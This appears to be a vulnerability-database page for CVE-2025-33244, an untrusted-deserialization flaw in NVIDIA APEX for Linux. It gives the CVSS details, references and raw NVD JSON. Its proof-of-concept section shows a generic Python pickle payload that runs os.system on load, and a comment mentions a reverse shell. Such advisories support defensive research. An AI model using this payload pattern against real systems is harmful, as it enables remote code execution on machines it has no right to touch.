CVE-2025-33244

Description

NVIDIA APEX for Linux contains a vulnerability where an unauthorized attacker could cause a deserialization of untrusted data. This vulnerability affects environments that use PyTorch versions earlier than 2.6. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, data tampering, and information disclosure.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

PyTorch < 2.6

NVIDIA APEX for Linux (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# Malicious payload class to execute code upon deserialization
class Exploit:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))

# Serialize the malicious object
payload = pickle.dumps(Exploit())

# In a real scenario, this payload would be sent to the vulnerable NVIDIA APEX component
# via the vulnerable interface or protocol.
print(f"Generated malicious payload: {payload}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33244
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33244
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33244/
[4] VulDB https://vuldb.com/cve/CVE-2025-33244
[5] https://nvd.nist.gov/vuln/detail/CVE-2025-33244
[6] https://nvidia.custhelp.com/app/answers/detail/a_id/5782
[7] https://www.cve.org/CVERecord?id=CVE-2025-33244

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33244", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:24.437", "lastModified": "2026-03-25T15:41:58.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA APEX for Linux contains a vulnerability where an unauthorized attacker could cause a deserialization of untrusted data. This vulnerability affects environments that use PyTorch versions earlier than 2.6. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, data tampering, and information disclosure."}, {"lang": "es", "value": "NVIDIA APEX para Linux contiene una vulnerabilidad donde un atacante no autorizado podría causar una deserialización de datos no confiables. Esta vulnerabilidad afecta a entornos que utilizan versiones de PyTorch anteriores a la 2.6. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, denegación de servicio, escalada de privilegios, manipulación de datos y revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33244", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5782", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33244", "source": "[email protected]"}]}}